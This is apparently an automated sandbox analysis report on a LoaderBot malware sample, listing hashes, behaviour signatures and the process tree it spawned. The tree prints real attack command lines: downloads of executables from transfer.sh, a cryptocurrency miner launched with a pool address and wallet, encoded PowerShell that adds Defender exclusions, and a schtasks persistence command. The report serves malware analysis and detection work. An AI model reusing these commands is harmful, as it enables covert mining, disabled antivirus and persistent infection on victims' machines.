Analysis

  • max time kernel
    151s
  • max time network
    153s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    05/01/2022, 14:45

General

  • Target

    ab11c319b441dfa9d17ee4a581001efe770fe2ef975ed993af6966df842f087c.exe

  • Size

    369KB

  • MD5

    4474e6fdd0c681c2b133e850626a4cbf

  • SHA1

    943216049e46b9725e33d9268c0f733b1a6c9f9b

  • SHA256

    ab11c319b441dfa9d17ee4a581001efe770fe2ef975ed993af6966df842f087c

  • SHA512

    6a4f7204d53c13091cbc2eedecc48688047b360fd00686a403f51032120544a51a5494d5541f450d5c9e392b6f0419ce27676fb4f9fb13d3b1aaae752214e51a

Malware Config

Signatures

  • LoaderBot

    LoaderBot is a loader written in .NET downloading and executing miners.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • LoaderBot executable 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 10 IoCs
  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 4 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 1 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry class 1 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 54 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ab11c319b441dfa9d17ee4a581001efe770fe2ef975ed993af6966df842f087c.exe
    "C:\Users\Admin\AppData\Local\Temp\ab11c319b441dfa9d17ee4a581001efe770fe2ef975ed993af6966df842f087c.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2520
    • C:\Windows\System32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C871.tmp\C872.tmp\C873.bat C:\Users\Admin\AppData\Local\Temp\ab11c319b441dfa9d17ee4a581001efe770fe2ef975ed993af6966df842f087c.exe"
      2⤵
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:2300
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\17064\123.vbs"
        3⤵
        • Blocklisted process makes network request
        PID:668
      • C:\Users\Admin\AppData\Local\Temp\C871.tmp\C872.tmp\extd.exe
        C:\Users\Admin\AppData\Local\Temp\C871.tmp\C872.tmp\extd.exe "/download" "https://transfer.sh/get/W6Ih4d/1.exe" "setup_c.exe" "" "" "" "" "" ""
        3⤵
        • Executes dropped EXE
        PID:828
      • C:\Users\Admin\AppData\Local\Temp\17064\setup_c.exe
        setup_c.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3048
      • C:\Users\Admin\AppData\Local\Temp\C871.tmp\C872.tmp\extd.exe
        C:\Users\Admin\AppData\Local\Temp\C871.tmp\C872.tmp\extd.exe "/download" "https://transfer.sh/get/An6EhV/2.exe" "setup_m.exe" "" "" "" "" "" ""
        3⤵
        • Executes dropped EXE
        PID:2292
      • C:\Users\Admin\AppData\Local\Temp\17064\setup_m.exe
        setup_m.exe
        3⤵
        • Executes dropped EXE
        • Drops startup file
        • Adds Run key to start application
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1232
        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:1660
      • C:\Users\Admin\AppData\Local\Temp\C871.tmp\C872.tmp\extd.exe
        C:\Users\Admin\AppData\Local\Temp\C871.tmp\C872.tmp\extd.exe "/download" "https://transfer.sh/get/hkrVHT/3.exe" "setup_s.exe" "" "" "" "" "" ""
        3⤵
        • Executes dropped EXE
        PID:316
      • C:\Users\Admin\AppData\Local\Temp\17064\setup_s.exe
        setup_s.exe
        3⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Checks whether UAC is enabled
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:1180
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2428
          • C:\Users\Admin\AppData\Local\Temp\build.exe
            "C:\Users\Admin\AppData\Local\Temp\build.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:708
            • C:\Windows\SYSTEM32\cmd.exe
              "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1156
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
                7⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1240
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
                7⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2240
            • C:\Windows\SYSTEM32\cmd.exe
              "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\services.exe"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2496
              • C:\Windows\system32\schtasks.exe
                schtasks /create /f /sc onlogon /rl highest /tn "services" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\services.exe"
                7⤵
                • Creates scheduled task(s)
                PID:1760
            • C:\Windows\SYSTEM32\cmd.exe
              "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\Microsoft\services.exe"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:3188
              • C:\Users\Admin\AppData\Roaming\Microsoft\services.exe
                C:\Users\Admin\AppData\Roaming\Microsoft\services.exe
                7⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:2292
                • C:\Windows\system32\cmd.exe
                  "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:680
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
                    9⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3120
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
                    9⤵
                      PID:1360
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1180 -s 548
            4⤵
            • Suspicious use of NtCreateProcessExOtherParentProcess
            • Program crash
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3960
        • C:\Users\Admin\AppData\Local\Temp\C871.tmp\C872.tmp\extd.exe
          C:\Users\Admin\AppData\Local\Temp\C871.tmp\C872.tmp\extd.exe "" "" "" "" "" "" "" "" ""
          3⤵
          • Executes dropped EXE
          PID:1080

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1180-215-0x0000000002400000-0x0000000002401000-memory.dmp

      Filesize

      4KB

    • memory/1180-202-0x0000000002690000-0x0000000002691000-memory.dmp

      Filesize

      4KB

    • memory/1180-226-0x00000000024C0000-0x00000000024C1000-memory.dmp

      Filesize

      4KB

    • memory/1180-225-0x0000000002870000-0x0000000002871000-memory.dmp

      Filesize

      4KB

    • memory/1180-224-0x0000000002400000-0x0000000002401000-memory.dmp

      Filesize

      4KB

    • memory/1180-222-0x0000000002880000-0x0000000002881000-memory.dmp

      Filesize

      4KB

    • memory/1180-223-0x0000000002400000-0x0000000002401000-memory.dmp

      Filesize

      4KB

    • memory/1180-221-0x0000000002810000-0x0000000002811000-memory.dmp

      Filesize

      4KB

    • memory/1180-220-0x0000000002820000-0x0000000002821000-memory.dmp

      Filesize

      4KB

    • memory/1180-218-0x00000000027F0000-0x00000000027F1000-memory.dmp

      Filesize

      4KB

    • memory/1180-157-0x0000000000400000-0x00000000006F6000-memory.dmp

      Filesize

      3.0MB

    • memory/1180-158-0x0000000000400000-0x00000000006F6000-memory.dmp

      Filesize

      3.0MB

    • memory/1180-219-0x0000000002860000-0x0000000002861000-memory.dmp

      Filesize

      4KB

    • memory/1180-217-0x0000000002840000-0x0000000002841000-memory.dmp

      Filesize

      4KB

    • memory/1180-216-0x0000000002830000-0x0000000002831000-memory.dmp

      Filesize

      4KB

    • memory/1180-214-0x0000000003460000-0x0000000003461000-memory.dmp

      Filesize

      4KB

    • memory/1180-188-0x0000000003460000-0x0000000003461000-memory.dmp

      Filesize

      4KB

    • memory/1180-167-0x0000000000870000-0x00000000008D0000-memory.dmp

      Filesize

      384KB

    • memory/1180-191-0x0000000002470000-0x0000000002471000-memory.dmp

      Filesize

      4KB

    • memory/1180-212-0x0000000003460000-0x0000000003461000-memory.dmp

      Filesize

      4KB

    • memory/1180-210-0x0000000003460000-0x0000000003461000-memory.dmp

      Filesize

      4KB

    • memory/1180-176-0x00000000027B0000-0x00000000027B1000-memory.dmp

      Filesize

      4KB

    • memory/1180-211-0x0000000003460000-0x0000000003461000-memory.dmp

      Filesize

      4KB

    • memory/1180-208-0x0000000002720000-0x0000000002721000-memory.dmp

      Filesize

      4KB

    • memory/1180-181-0x0000000002760000-0x0000000002761000-memory.dmp

      Filesize

      4KB

    • memory/1180-182-0x00000000027D0000-0x00000000027D1000-memory.dmp

      Filesize

      4KB

    • memory/1180-183-0x00000000027A0000-0x00000000027A1000-memory.dmp

      Filesize

      4KB

    • memory/1180-209-0x0000000003460000-0x0000000003461000-memory.dmp

      Filesize

      4KB

    • memory/1180-178-0x0000000002770000-0x0000000002771000-memory.dmp

      Filesize

      4KB

    • memory/1180-174-0x0000000002740000-0x0000000002741000-memory.dmp

      Filesize

      4KB

    • memory/1180-172-0x0000000002790000-0x0000000002791000-memory.dmp

      Filesize

      4KB

    • memory/1180-169-0x0000000002780000-0x0000000002781000-memory.dmp

      Filesize

      4KB

    • memory/1180-207-0x00000000026B0000-0x00000000026B1000-memory.dmp

      Filesize

      4KB

    • memory/1180-184-0x0000000003470000-0x0000000003471000-memory.dmp

      Filesize

      4KB

    • memory/1180-186-0x0000000003460000-0x0000000003461000-memory.dmp

      Filesize

      4KB

    • memory/1180-185-0x0000000003460000-0x0000000003461000-memory.dmp

      Filesize

      4KB

    • memory/1180-187-0x0000000003460000-0x0000000003461000-memory.dmp

      Filesize

      4KB

    • memory/1180-206-0x00000000026C0000-0x00000000026C1000-memory.dmp

      Filesize

      4KB

    • memory/1180-190-0x0000000002460000-0x0000000002461000-memory.dmp

      Filesize

      4KB

    • memory/1180-204-0x0000000002700000-0x0000000002701000-memory.dmp

      Filesize

      4KB

    • memory/1180-193-0x0000000002410000-0x0000000002411000-memory.dmp

      Filesize

      4KB

    • memory/1180-195-0x0000000002430000-0x0000000002431000-memory.dmp

      Filesize

      4KB

    • memory/1180-196-0x0000000002490000-0x0000000002491000-memory.dmp

      Filesize

      4KB

    • memory/1180-197-0x00000000024B0000-0x00000000024B1000-memory.dmp

      Filesize

      4KB

    • memory/1180-198-0x0000000003460000-0x0000000003461000-memory.dmp

      Filesize

      4KB

    • memory/1180-199-0x0000000003460000-0x0000000003461000-memory.dmp

      Filesize

      4KB

    • memory/1180-200-0x00000000026D0000-0x00000000026D1000-memory.dmp

      Filesize

      4KB

    • memory/1180-201-0x00000000026E0000-0x00000000026E1000-memory.dmp

      Filesize

      4KB

    • memory/1232-141-0x0000000000220000-0x000000000067B000-memory.dmp

      Filesize

      4.4MB

    • memory/1232-152-0x00000000754F0000-0x0000000076838000-memory.dmp

      Filesize

      19.3MB

    • memory/1232-143-0x0000000074120000-0x00000000742E2000-memory.dmp

      Filesize

      1.8MB

    • memory/1232-148-0x0000000070E60000-0x0000000070EE0000-memory.dmp

      Filesize

      512KB

    • memory/1232-142-0x00000000007B0000-0x00000000007B1000-memory.dmp

      Filesize

      4KB

    • memory/1232-145-0x0000000000220000-0x000000000067B000-memory.dmp

      Filesize

      4.4MB

    • memory/1232-150-0x0000000076900000-0x0000000076E84000-memory.dmp

      Filesize

      5.5MB

    • memory/1232-144-0x00000000750F0000-0x00000000751E1000-memory.dmp

      Filesize

      964KB

    • memory/1232-151-0x0000000000750000-0x0000000000795000-memory.dmp

      Filesize

      276KB

    • memory/1232-147-0x0000000000220000-0x000000000067B000-memory.dmp

      Filesize

      4.4MB

    • memory/2428-175-0x0000000000040000-0x0000000000041000-memory.dmp

      Filesize

      4KB

    • memory/2428-173-0x0000000000040000-0x0000000000041000-memory.dmp

      Filesize

      4KB

    • memory/2428-194-0x00000000089D0000-0x0000000008ADA000-memory.dmp

      Filesize

      1.0MB

    • memory/2428-213-0x0000000008900000-0x000000000894B000-memory.dmp

      Filesize

      300KB

    • memory/2428-205-0x00000000088C0000-0x00000000088FE000-memory.dmp

      Filesize

      248KB

    • memory/2428-192-0x0000000006410000-0x0000000006422000-memory.dmp

      Filesize

      72KB

    • memory/2428-203-0x00000000088C0000-0x0000000008EC6000-memory.dmp

      Filesize

      6.0MB

    • memory/2428-162-0x0000000000400000-0x0000000000420000-memory.dmp

      Filesize

      128KB

    • memory/2428-231-0x0000000000040000-0x0000000000041000-memory.dmp

      Filesize

      4KB

    • memory/2428-179-0x0000000000400000-0x0000000000420000-memory.dmp

      Filesize

      128KB

    • memory/2428-180-0x0000000000400000-0x0000000000420000-memory.dmp

      Filesize

      128KB

    • memory/2428-177-0x0000000000040000-0x0000000000041000-memory.dmp

      Filesize

      4KB

    • memory/2428-189-0x0000000008ED0000-0x00000000094D6000-memory.dmp

      Filesize

      6.0MB

    • memory/3048-128-0x0000000000220000-0x0000000000221000-memory.dmp

      Filesize

      4KB

    • memory/3048-170-0x0000000004EF0000-0x0000000004EFA000-memory.dmp

      Filesize

      40KB

    • memory/3048-135-0x0000000070E60000-0x0000000070EE0000-memory.dmp

      Filesize

      512KB

    • memory/3048-146-0x0000000076900000-0x0000000076E84000-memory.dmp

      Filesize

      5.5MB

    • memory/3048-132-0x00000000750F0000-0x00000000751E1000-memory.dmp

      Filesize

      964KB

    • memory/3048-131-0x0000000000E30000-0x0000000000E75000-memory.dmp

      Filesize

      276KB

    • memory/3048-149-0x00000000754F0000-0x0000000076838000-memory.dmp

      Filesize

      19.3MB

    • memory/3048-153-0x0000000004F10000-0x0000000004F11000-memory.dmp

      Filesize

      4KB

    • memory/3048-133-0x0000000000EA0000-0x0000000000F02000-memory.dmp

      Filesize

      392KB

    • memory/3048-130-0x0000000074120000-0x00000000742E2000-memory.dmp

      Filesize

      1.8MB

    • memory/3048-161-0x0000000005700000-0x0000000005792000-memory.dmp

      Filesize

      584KB

    • memory/3048-129-0x0000000000EA0000-0x0000000000F02000-memory.dmp

      Filesize

      392KB

    • memory/3048-134-0x0000000000EA0000-0x0000000000F02000-memory.dmp

      Filesize

      392KB

    • memory/3048-159-0x0000000005B20000-0x000000000601E000-memory.dmp

      Filesize

      5.0MB